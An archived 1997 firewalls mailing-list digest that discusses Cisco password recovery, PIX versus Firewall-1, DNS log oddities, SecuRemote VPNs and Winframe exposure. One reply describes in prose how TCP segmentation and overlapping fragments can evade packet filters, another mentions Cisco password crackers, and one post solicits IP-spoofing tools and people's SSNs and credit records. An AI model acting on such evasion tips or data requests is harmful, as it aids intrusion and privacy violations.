FW1 is installed. > > >=20 > > > J=FCri > > >=20 > > >=20 > >=20 > >=20 From owner-firewalls-outgoing Fri Jun 6 03:44:00 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id TAA20259 for firewalls-outgoing; Thu, 5 Jun 1997 19:13:09 -0700 (PDT) Received: from halon.sybase.com (halon.sybase.com [192.138.151.33]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id TAA20224 for ; Thu, 5 Jun 1997 19:12:58 -0700 (PDT) Received: from smtp1.sybase.com (sybgate.sybase.com [130.214.220.35]) by halon.sybase.com (8.8.4/8.8.4) with SMTP id TAA10617 for ; Thu, 5 Jun 1997 19:20:26 -0700 (PDT) Received: from notesgw2.sybase.com by smtp1.sybase.com (4.1/SMI-4.1/SybH3.5-030896) id AA23601; Thu, 5 Jun 97 19:18:43 PDT Received: (from unixsvr1@localhost) by notesgw2.sybase.com (8.8.4/8.8.4) id TAA13786 for @sybgate.sybase.com:firewalls@GreatCircle.COM; Thu, 5 Jun 1997 19:17:38 -0700 (PDT) Message-Id: <199706060217.TAA13786@notesgw2.sybase.com> Received: by SybaseNotes (Lotus Notes Mail Gateway for SMTP V1.1) id 795ED84F44DAAEF7882564AE000D0505; Thu, 5 Jun 97 19:17:36 EDT To: "Steve Rudolph" Cc: "David Harvey-George" , firewalls From: Ryan Russell/SYBASE Date: 5 Jun 97 19:24:08 EDT Subject: Re: FW-1 and IP Forwarding on NT Box X-Lotus-Type: Reply All Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Retrieving and/or resetting the Cisco password is fairly trivial if there is a console port on that card.. haven't used the card version, but I've done it on real 2500's many times. Search the Cisco web site for "password recovery." If they've turned on password encryption, you can either change the password, or do a web search for Cisco password crackers, I've seen a couple. Haven't tried those. Ryan ---------- Previous Message ---------- To: david, firewalls cc: From: srudolph @ datacommcorp.com ("Steve Rudolph") @ smtp Date: 06/05/97 08:26:39 AM Subject: Re: FW-1 and IP Forwarding on NT Box David and group.... I have already got this running. Thank you to all who responed to my inquiry. I have learned alot just from the replys. I left my brain in the shower that day..... I forgot to set the Default Gateway on EACH machine on both networks to the NIC in the router on that machines network. Now I just need to krak the router password for a Cisco AccessPro 2500 PC card. This piece of equipment came in a firewall disguise call MCI Webmaker. This was a combination Port filter router and proxy server. As it turns out Intel programed the software (proxy), and configured the router. Vanstar installed the os (NT), and none of the above are able to get me the router password. Right now my DNS is being partially blocked because of this (I know very little about DNS, any good books? I am using MS DNS-OK for now (:o) ). I contacted Cisco and the only way to break the password is to send a break to the com port (remember it is a pc card) in terminal mode within 60 seconds. And then begin the recovery sequence. Kind of hard to do with NT or 95. I can't seem to find a copy of Dos 5.0 or an old hard drive anywhere with a dos based terminal program. Ths whole situation is messed. My employer wants to wait to use the router and not buy a new one. It is holding up US$40K in billing though. Can anyone help, or if you have a similar problem let me know and I will get you the correct person to call. Thanks again Steve Rudoph http://www.datacommcorp.com srudolph@datacommcorp.com http://www.rude-dog.com http://www.rust.net/~stever stever@rust.net ---------- > From: David Harvey-George > To: Steve Rudolph ; firewalls@greatcircle.com > Subject: Re: FW-1 and IP Forwarding on NT Box > Date: Wednesday, June 04, 1997 7:14 PM > > > > I followed all of microsoft's reccomendations. > > Possibly a bad move. > > > Two nic cards a and b > > Sounds like the start of a stand-up comedy routine > > > > > A is set with default gateway of b > > and b is set with gateway of a > > it is! > > Okay, look, the system with the two cards knows how to route to each > network. All you've gotta do is set up the default gateway for > workstations on network A (NIC A) and the default gateway for workstations > on network B (NIC B). Don't touch anything on the router if your network > really is this simple (e.g. no other routes). If you have other routes > then use the route command directly. > > > Workstations can ping a and b > > Workstations cannot ping network b > > Ip forwarding is enabled and my route print matches exactly the format of > > microsofts reccomendations. > > > > I really need to get this up and running. I would get you the route > print, > > but I cannot get the addresses to copy onto the clip board..duh :) > > Yeah, I think you better send us the output from netstat on both the > 'router' and the workstations. > > Run netstat -rn from a DoZ window, click on the little Doz icon at the left > of the title bar, select edit/mark, mark the stuff you want to send, copy > it and paste it. > > David From owner-firewalls-outgoing Fri Jun 6 03:50:33 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id AAA25483 for firewalls-outgoing; Fri, 6 Jun 1997 00:51:06 -0700 (PDT) Received: from brussels.cisco.com (brussels.cisco.com [171.68.129.238]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id AAA25411 for ; Fri, 6 Jun 1997 00:50:40 -0700 (PDT) Received: from cons-evyncke.cisco.com (brussels-ppp3.cisco.com [171.68.146.24]) by brussels.cisco.com (8.8.5/8.8.5) with SMTP id JAA26106; Fri, 6 Jun 1997 09:52:14 +0200 (METDST) Message-Id: <3.0.32.19970606094942.006e0a64@brussels.cisco.com> X-Sender: evyncke@brussels.cisco.com X-Mailer: Windows Eudora Pro Version 3.0 (32) Date: Fri, 06 Jun 1997 09:54:51 +0000 To: Craig Brozefsky , Bill Stout From: Eric Vyncke Subject: RE: PIX and Firewall-1 Cc: firewalls@GreatCircle.COM Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Craig, Cannot resist to reply :-) Beware that I'm working for Cisco Systems ;-) At 10:47 5/06/97 -0500, Craig Brozefsky wrote: >On Wed, 4 Jun 1997, Bill Stout wrote: > >> Peter Carlson writes.... >> >in whatway are application level gateways more secure than, say, FW-1 or PIX? >> >There are certainly capabilities that can be provided via application >> >proxies that can't be provided by any filter-based technologies, but what >> >types of attacks are a FW-1 or a PIX vulnerable to that application >> >proxies aren't? > >You should check should out comp.security.firewalls for a good >discussion of these issues. PIX is a NAT capable router with a few >filtering rules thrown in, such things are hardly safe, architecturally, >and implementation wise. NAT is NOT, I repeat NOT! a security tool, and >should not be treated as a part of your security infrastructure. Nearly >all NAT tools are not designed with security in mind. > I both agree and disagree: 1) NAT is NOT a security feature, I agree thus 200% with you 2) but I agree at 0% with you when you say that PIX is just a NAT router with rules. - PIX is not a router at all, it is not based on our IOS router software - PIX is able to NAT but is not limited to NAT - PIX is very strong due to its fullstate inspection against attacks for IP, TCP, ... protocols: SYN flooding, IP spoofing, TCP/IP session hijakcing, ... It also randomized the TCP sequence numbers of the TCP sessions going through it - PIX knows about the internal of some protocols (from ICMP, to RealAudio via HTTP) and is able to check / react on these protocols - ... I'm stopping now because it is coming too commercial on a technical list. But, once again: the PIX is a secure and performent component of most security architecture. [snip...] Best regards Eric Eric Vyncke Technical Consultant Cisco Systems Belgium SA/NV Phone: +32-2-778.4677 Fax: +32-2-778.4300 E-mail: evyncke@cisco.com Mobile: +32-75-312.458 From owner-firewalls-outgoing Fri Jun 6 04:02:35 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id BAA03779 for firewalls-outgoing; Fri, 6 Jun 1997 01:34:23 -0700 (PDT) Received: from h01.scientia.com (h01.scientia.com [194.216.183.1]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id BAA03732 for ; Fri, 6 Jun 1997 01:34:10 -0700 (PDT) Received: by h01.scientia.com with SMTP id JAA03645; Fri, 6 Jun 1997 09:38:13 +0100 Message-Id: <199706060838.JAA03645@h01.scientia.com> X-Sender: firewall@pop-server X-Mailer: Windows Eudora Light Version 1.5.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Fri, 06 Jun 1997 09:37:27 +0100 To: firewalls@greatcircle.com From: Ian Miller Subject: Re: Unknown log entry... Cc: devin@TELERAMA.LM.COM"Tod McQuillin, as Technical Contact for zone LM.COM" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 19:05 05/06/97 -0700, Cihan Subasi wrote: >I had those two line in my firewall logs, can anybody explain me what >are they??? > >-------------------------------------------------- >Jun 2 20:30:49 fw1 sendmail[16650]: gethostby*.getanswer: asked for >"66.3.196.208.in-addr.arpa IN PTR", got type "CNAME" >Jun 2 20:30:49 fw1 sendmail[16650]: gethostby*.getanswer: asked for >"66.3.196.208.in-addr.arpa", got "66.64.3.196.208.in-addr.arpa" >-------------------------------------------------- Your mail server has tried to do a reverse lookup on IP address 208.196.3.66 (karnov.lm.com) and has got some VERY odd results. Reverse lookup on IP address ... is done by looking domain ....in-addr.arpa. This should contain PTR (name->IP) records. However if you look up 208.196.3.66 you get:- CNAME/ARPA "66.3.196.208.in-addr.arpa" 6h "66.64.3.196.208.in-addr.arpa" CNAME records are name->name (alias) records. This is wierd for an in-addr.arpa domain and it has not surprisingly confused your firewall. If you follow up the (I think non-sensical CNAME) you get. PTR/ARPA "66.64.3.196.208.in-addr.arpa" 1d "karnov.lm.com" I have no idea why this DNS is set-up this. Ian From owner-firewalls-outgoing Fri Jun 6 04:46:28 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id DAA25369 for firewalls-outgoing; Fri, 6 Jun 1997 03:28:09 -0700 (PDT) Received: from gatekeeper.tsc.tdk.com (gatekeeper.tsc.tdk.com [207.113.159.21]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id DAA23520 for ; Fri, 6 Jun 1997 03:18:52 -0700 (PDT) Received: from sunrise.gv.tsc.tdk.com (root@sunrise.gv.tsc.tdk.com [192.168.241.191]) by gatekeeper.tsc.tdk.com (8.8.4/8.8.4) with ESMTP id DAA25165; Fri, 6 Jun 1997 03:22:37 -0700 (PDT) Received: from salsa.gv.tsc.tdk.com (salsa.gv.tsc.tdk.com [192.168.241.194]) by sunrise.gv.tsc.tdk.com (8.8.5/8.8.5) with ESMTP id DAA16305; Fri, 6 Jun 1997 03:22:36 -0700 (PDT) Received: (from gdonl@localhost) by salsa.gv.tsc.tdk.com (8.8.5/8.8.5) id DAA07719; Fri, 6 Jun 1997 03:22:34 -0700 (PDT) From: Don Lewis Message-Id: <199706061022.DAA07719@salsa.gv.tsc.tdk.com> Date: Fri, 6 Jun 1997 03:22:34 -0700 In-Reply-To: Cy Ardoin "Re: PIX and FW-1 (packet filter Question)" (Jun 5, 2:11pm) X-Mailer: Mail User's Shell (7.2.6 alpha(3) 7/19/95) To: Cy Ardoin , "Jonathan M. Bresler" Subject: Re: PIX and FW-1 (packet filter Question) Cc: Firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Jun 5, 2:11pm, Cy Ardoin wrote: } Subject: Re: PIX and FW-1 (packet filter Question) } On Thu, 5 Jun 1997, Jonathan M. Bresler wrote: } } > } > >I don't think there is anything an application firewall can } > >do that can't also be done by a "packet filter" firewall. The } > } > trivial example: } > a smtp application level proxy can disable the "debug" command } > for every sendmail behind that firewall. } } Finding and removing the "debug" command from smtp connections at the } packet layer isn't much different than finding and altering the PORT and } PASV part of the FTP command and all the NAT style packet filters } modify the FTP commands. It's not something packet filters do, but } it is no more difficult than many of the things they already do. What if each character in "debug" is sent in a separate TCP segment? What if the segments are sent out of order? What if "debug" is part of one TCP segment that is fragmented with overlapping fragments such that you don't see "debug" until the fragments are reassembled in a certain way? And don't forget, you need to keep track of the entire state of the SMTP connection, so that you don't drop the connection because "debug" is in the text of the message. The reassmbly and reordering is done by the TCP stack in an application proxy firewall, so the application proxy and the destination mail server will see the same cleaned-up datastream. I seem to recall that the FW-1 ftp command stream rewriting broke if the packet boundaries happened to occur in inconvenient places (I believe they fixed this a while ago). If you're just relying on your firewall to rewrite your ftp commands, then about the worst thing a hostile ftp client could do is just not work. If you're relying on your firewall to sanitize incoming data streams, then any failures to accurately track the connection state could result in a security breach. In principle, a stateful packet filter and an application proxy can do the same thing, but it would take a very large number of states to duplicate what the network stack does with input packets. Even if your packet filter implements an equivalent state machine, there is the danger that the destination host works in an unexpected way that still leaves it vulnerable. Probably the easiest and safest thing for the packet filter can do is to throw away fragmented packets and out of order TCP segments, but I suspect that violates some of the "should" and "must" clauses in the RFCs. --- Truck From owner-firewalls-outgoing Fri Jun 6 05:01:01 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id DAA02834 for firewalls-outgoing; Fri, 6 Jun 1997 03:56:48 -0700 (PDT) Received: from proxy.src.siemens.es (ms1.src.siemens.es [195.53.72.4]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id DAA02796 for ; Fri, 6 Jun 1997 03:56:34 -0700 (PDT) Received: from cceballos.src.siemens.es by proxy.src.siemens.es with SMTP (Microsoft Exchange Internet Mail Service Version 5.0.1457.7) id LG9HY3VF; Fri, 6 Jun 1997 13:04:17 +0200 Message-ID: <3397EF0A.68E1@iponet.es> Date: Fri, 06 Jun 1997 13:05:46 +0200 From: Cristina Ceballos Reply-To: cceballos@src.siemens.es Organization: Siemens Redes Corporativas X-Mailer: Mozilla 3.0Gold (Win95; I) MIME-Version: 1.0 To: firewalls@greatcircle.com Subject: SecuRemote on FireWall-1 3.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello, I am trying to use Securemote to access the internal network from the internet in an encryted manner. In order to do that I have to install the securemote client on the PC accessing my network from the Internet and also, on the servers side, Securemote is implemented on top of a Firewall-1 Virtual Private network. My questions are: Is a Virtual Private Network just an object (network type) I have to define???? Do I need to have a Certified Key in order to be able to use this encryption???? (I shoundt..) If anyone is using SecureRemote I would appreciate your help. Thans. Cristina Ceballos -- -----BEGIN PGP PUBLIC KEY BLOCK----- Version: INAS 1.0.2 mQCNAjNfHNsAAAEEAMDAXftbeYZEfqRDRLJSxoMRoWjizoY+0sIh4FvrNkrW4A5Y qEdpPJhwT7nIRQX5iI0HFSWUjYCNwUqvloiWZHJ1aCZpv6exfYthOcnEoRLnu9Vp sXEpZ8XT4iQMM9QTeRlDvtlHYbtVJal9bSK5bs+62Z9Kcp3Tj0I7PxDU55yBAAMF tCxDcmlzdGluYSBDZWJhbGxvcyA8Y2NlYmFsbG9zQHNyYy5zaWVtZW5zLmVzPokA lQIFEDNfHNtCOz8Q1OecgQEBVW4D/AgekAW+MxDk6VAWJOW3ZaYGggQVnH2kPZGP Ox0t7TKrfsMhQItYLfQCjQl3/PQ4rCRUv3g0mcSa4ctXB21mNVkI0B3s9iVM59p1 cvQMUnmdVqkBVoslMuktqnfTIVSCY0FvFFAN5QhK4fN89LOpqleg509CrRQhrlVB 5c2YKtKk =tBjV -----END PGP PUBLIC KEY BLOCK----- From owner-firewalls-outgoing Fri Jun 6 05:52:37 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id QAA21243 for firewalls-outgoing; Thu, 5 Jun 1997 16:39:52 -0700 (PDT) Received: from pctb.industryone.net ([208.135.121.10]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id QAA21204 for ; Thu, 5 Jun 1997 16:39:40 -0700 (PDT) Received: from [206.114.39.33] by pctb.industryone.net (SMTPD32-3.03) id AEF765C011E; Thu, 05 Jun 1997 19:42:47 -0400 Message-ID: <339FE10D.7AB3@Who.net> Date: Thu, 12 Jun 1997 07:44:13 -0400 From: -= TaLoN =- Reply-To: Talon@Who.net Organization: CVI SOFTWARE X-Mailer: Mozilla 3.0 (Win95; I) MIME-Version: 1.0 To: firewalls@greatcircle.com Subject: IP SPOOFING Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Okay, I'm pretty new to invesitgative services with Internet Service Providers but what I'm mainly interested in would be information related with Faking / SPoofing IP Addresses & Network Nodes. If anyone out there has any information related to that or even information or software which allows to do that. Please send it to me at Talon@who.net . Also, looking for assistance in finding information on people. (i.e. SSN, CREDIT RECORDS, ETC.) please email me AS SOON as you get any information. Thanks! Once Again, please email me : Talon@mail.org Jason Burton - Certified Network Investigator Vector Classified Section From owner-firewalls-outgoing Fri Jun 6 05:58:36 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id SAA13382 for firewalls-outgoing; Thu, 5 Jun 1997 18:37:38 -0700 (PDT) Received: from mail.clark.net (mail.clark.net [168.143.0.10]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id SAA13328 for ; Thu, 5 Jun 1997 18:37:18 -0700 (PDT) Received: from mjr.clark.net (mjr.clark.net [168.143.19.61]) by mail.clark.net (8.8.5/8.6.5) with SMTP id VAA24079 for ; Thu, 5 Jun 1997 21:40:46 -0400 (EDT) Message-Id: <199706060140.VAA24079@mail.clark.net> Comments: Authenticated sender is From: "Marcus J. Ranum" Organization: Network Flight Recorder, Inc. To: Firewalls@GreatCircle.COM Date: Thu, 5 Jun 1997 21:39:18 +0000 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: Fortezza's Fate?? Reply-to: mjr@clark.net In-reply-to: <199706051957.MAA15686@honor.greatcircle.com> X-mailer: Pegasus Mail for Win32 (v2.53/R1) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > There are a lot of rumors buzzing around DC these days to the > effect that NSA and the Joint Chiefs have tossed in the towel and will, > within weeks, approve DoD purchases for non-Fortezza security systems, for > both strong authentication Wow!! I bet that's gonna really do wonders for all your Security Dynamics stock options, Vin! Congrats!! mjr. ----- Marcus J. Ranum, CEO, Network Flight Recorder, Inc. Personal Work New Book!! From owner-firewalls-outgoing Fri Jun 6 06:01:43 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id EAA08832 for firewalls-outgoing; Fri, 6 Jun 1997 04:27:57 -0700 (PDT) Received: from namsa.nato.int (ddnfw0.namsa.nato.int [147.36.201.2]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id DAA01385 for ; Fri, 6 Jun 1997 03:48:44 -0700 (PDT) Received: by ddnfw0.namsa.nato.int id <17033-1>; Fri, 6 Jun 1997 12:53:12 +0100 Message-Id: <97Jun6.125312gmt+0100.17033-1@ddnfw0.namsa.nato.int> Date: Fri, 6 Jun 1997 11:53:36 +0100 From: Thierry GUINET X-Mailer: Mozilla 3.0 (X11; I; HP-UX A.09.05 9000/735) Mime-Version: 1.0 To: Robert Sthlbrand Cc: firewalls@GreatCircle.COM Subject: Re: [FW1] Out of Band Data Attack against NT-Hosts References: <43BED8177D10D011A69A0800092C15D7011BFD@haig.oplab.nmac.ericsson.se> Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: quoted-printable Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Robert St=E5hlbrand wrote: > = > What is the problem here??? > Of course (as Mike Hedlund says) is a NT-machine (win95 and win3.11 as > well) only vulnerable to the OOB-bug on port 139 (netbios) and I REALLY= I hope I'm doing a false assertion, but I think your wrong, I read that some tests have been done, using urgent flag against port 80 and that it worked just fine :( I don't have the paper under the eyes but if you're interrested I can dig into my archives. Thierry -- = Thierry Guinet = T.Guinet@namsa.nato.int Phone: +352/30.63-6812 Fax: +352/30.87.21 In order to create an apple pie from scratch, you must first create the universe. Carl Sagan From owner-firewalls-outgoing Fri Jun 6 06:01:48 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id TAA18424 for firewalls-outgoing; Thu, 5 Jun 1997 19:03:12 -0700 (PDT) Received: from m4.nassau.cv.net (m4.nassau.cv.net [167.206.32.6]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id TAA18360 for ; Thu, 5 Jun 1997 19:02:51 -0700 (PDT) Received: from m5.nassau.cv.net by m4.nassau.cv.net with ESMTP (1.40.112.8/16.2) id AA199602806; Thu, 5 Jun 1997 22:06:46 -0400 Received: from nassau.cv.net.nassau.cv.net ([10.4.55.84]) by m5.nassau.cv.net with SMTP (1.40.112.8/16.2) id AA191992804; Thu, 5 Jun 1997 22:06:44 -0400 Message-Id: <3.0.1.16.19970605220043.356f0950@mail-hub> X-Sender: kgunther@mail-hub X-Mailer: Windows Eudora Light Version 3.0.1 (16) Date: Thu, 05 Jun 1997 22:00:43 -0400 To: firewalls@GreatCircle.COM From: Ken Gunther Subject: Does Winframe need a firewall? Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk We are currently using Winframe by Citrix to give remote users access to applications at our datacenter. Access to the Winframe box is through the IBM Global Network (IGN). IGN is a subscribers only network. It is not as open as the Internet but by no means do we have control over who is on it. We currently have a firewall in front of the Winframe box but there is a noticable delay in keystrokes when going through the firewall (TIS Toolkit on a Linux box). We have performed some tests where for short periods of time the Winframe box was connected directly to the IGN and the keystroke delays went away. Is Winframe safe to put directly on the untrusted network? We are worried about unauthorized people getting through to the trusted side as well as denial of service attacks where people try to crash Winframe. Ken (kgunther@nassau.cv.net) From owner-firewalls-outgoing Fri Jun 6 06:54:18 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id AAA25482 for firewalls-outgoing; Fri, 6 Jun 1997 00:51:03 -0700 (PDT) Received: from brussels.cisco.com (brussels.cisco.com [171.68.129.238]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id AAA25385 for ; Fri, 6 Jun 1997 00:50:35 -0700 (PDT) Received: from cons-evyncke.cisco.com (brussels-ppp3.cisco.com [171.68.146.24]) by brussels.cisco.com (8.8.5/8.8.5) with SMTP id JAA26103; Fri, 6 Jun 1997 09:52:11 +0200 (METDST) Message-Id: <3.0.32.19970606094235.006df76c@brussels.cisco.com> X-Sender: evyncke@brussels.cisco.com X-Mailer: Windows Eudora Pro Version 3.0